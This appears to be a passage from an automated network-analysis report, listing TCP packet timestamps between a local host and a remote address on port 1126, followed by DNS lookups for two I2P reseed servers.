Oct 12, 2024 20:30:07.087552071 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087563038 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.087588072 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087619066 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087645054 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.087651014 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087697029 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087714911 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.087745905 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087779045 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087802887 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.087810040 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087842941 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087862015 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.087871075 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087908983 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.087918997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087951899 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087980032 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.088006020 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.088011026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.088043928 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.088056087 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.088076115 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.088109016 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.088120937 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.088140965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.088174105 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.088208914 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.088213921 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.088241100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.088268995 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.088274956 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.088309050 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.088319063 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.088340998 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.088373899 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.088385105 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.089173079 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.089222908 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.089229107 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.089257002 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.089287996 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.089308023 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.089323997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.089355946 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.089370012 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.089387894 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.089438915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.089472055 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.089493036 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.089524984 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.089548111 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.089557886 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.089589119 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.089622021 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.089643002 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.089654922 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.089679003 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.090307951 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.090337038 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.090362072 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.090387106 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.090420008 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.090447903 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.090451002 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.090482950 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.090507030 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.090513945 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.090548038 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.090557098 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.129280090 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.129323959 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.129337072 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.129358053 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.129391909 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.129426003 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.129447937 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.129460096 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.129486084 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.129494905 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.129637003 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.173476934 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.173532963 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.173571110 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.173587084 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.173604012 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.173636913 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.173664093 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.173671007 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.173711061 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.173719883 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.176862955 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.176896095 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.176912069 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.176929951 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.176992893 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.177059889 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.177112103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.177145958 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.177174091 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.177180052 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.177213907 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.177299976 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.177777052 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.177810907 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.177834034 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.177861929 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.177896023 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.177921057 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.177928925 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.177961111 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.177995920 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.178008080 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.178040981 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.178889990 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179090023 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179147959 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.179152012 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179203033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179235935 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179260969 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.179269075 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179301977 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179315090 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.179336071 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179367065 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179379940 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.179419041 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179451942 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179465055 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.179486036 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179517031 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179548025 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.179569960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179620028 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179653883 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179666996 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.179703951 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179729939 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.179754019 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179790974 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179827929 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179835081 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.179874897 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.179878950 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179910898 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.179960012 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180001974 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.180011034 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180042028 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180075884 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180088997 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.180108070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180119991 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.180141926 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180175066 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180190086 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.180207968 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180239916 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180263042 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.180273056 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180300951 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180320978 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.180334091 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180375099 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.180386066 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180418015 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180450916 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180474043 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.180507898 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180553913 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.180560112 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180593014 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180627108 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180655956 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.180659056 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180691957 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180716991 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.180723906 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180757046 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180788040 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180799961 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.180821896 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180838108 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.180855036 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180886984 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180897951 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.180919886 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180952072 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.180980921 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.181006908 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.181013107 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.181020975 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.181046963 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.181078911 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.181102037 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.181113005 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.181145906 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.181180000 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.181194067 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.181212902 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.181246042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.181246042 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.181278944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.181293964 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.181315899 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.181346893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.181361914 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.181380987 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.181415081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.181442022 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.199126959 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.199178934 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.199203968 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.199238062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.199270010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.199290037 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.199306011 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.199358940 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.199405909 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.199425936 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.199460983 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.199493885 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.199512005 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.199527025 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.199532032 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.199562073 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.199594975 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.199626923 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.199639082 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.199661016 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.199670076 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.199692965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.199728966 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.199760914 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.199775934 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.199795008 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.199805975 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.199827909 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.199863911 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.199873924 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.221985102 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.222037077 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.222053051 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.222073078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.222107887 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.222136021 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.222142935 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.222176075 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.222188950 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.222209930 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.222245932 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.222264051 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.266307116 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.266340017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.266364098 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.266374111 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.266424894 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.266436100 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.266459942 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.266491890 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.266515017 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.266525030 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.266561031 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.266577959 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.269478083 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.269527912 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.269531965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.269584894 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.269618988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.269654036 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.269666910 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.269685984 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.269716978 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.269720078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.269766092 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.270266056 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.270318031 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.270353079 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.270385027 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.270399094 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.270417929 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.270428896 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.270452023 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.270487070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.270518064 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.270962954 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.270992041 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.271018028 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.271043062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.271076918 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.271109104 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.271125078 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.271157026 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.271159887 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.271192074 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.271225929 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.271246910 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.271259069 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.271291971 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.271300077 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.271325111 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.271357059 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.271400928 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.271409988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.271445990 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.271477938 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.271493912 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.271511078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.271521091 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.271593094 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.271625996 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.271651983 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.271677971 CEST	1126	49710	146.70.24.213	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 12, 2024 20:30:21.098134995 CEST	192.168.2.6	1.1.1.1	0x7134	Standard query (0)	reseed.memcpy.io	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:31:25.712086916 CEST	192.168.2.6	1.1.1.1	0x7c45	Standard query (0)	reseed.stormycloud.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 12, 2024 20:30:21.112405062 CEST	1.1.1.1	192.168.2.6	0x7134	No error (0)	reseed.memcpy.io		95.216.2.172	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:31:25.722909927 CEST	1.1.1.1	192.168.2.6	0x7c45	No error (0)	reseed.stormycloud.org		144.172.118.154	A (IP address)	IN (0x0001)	false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
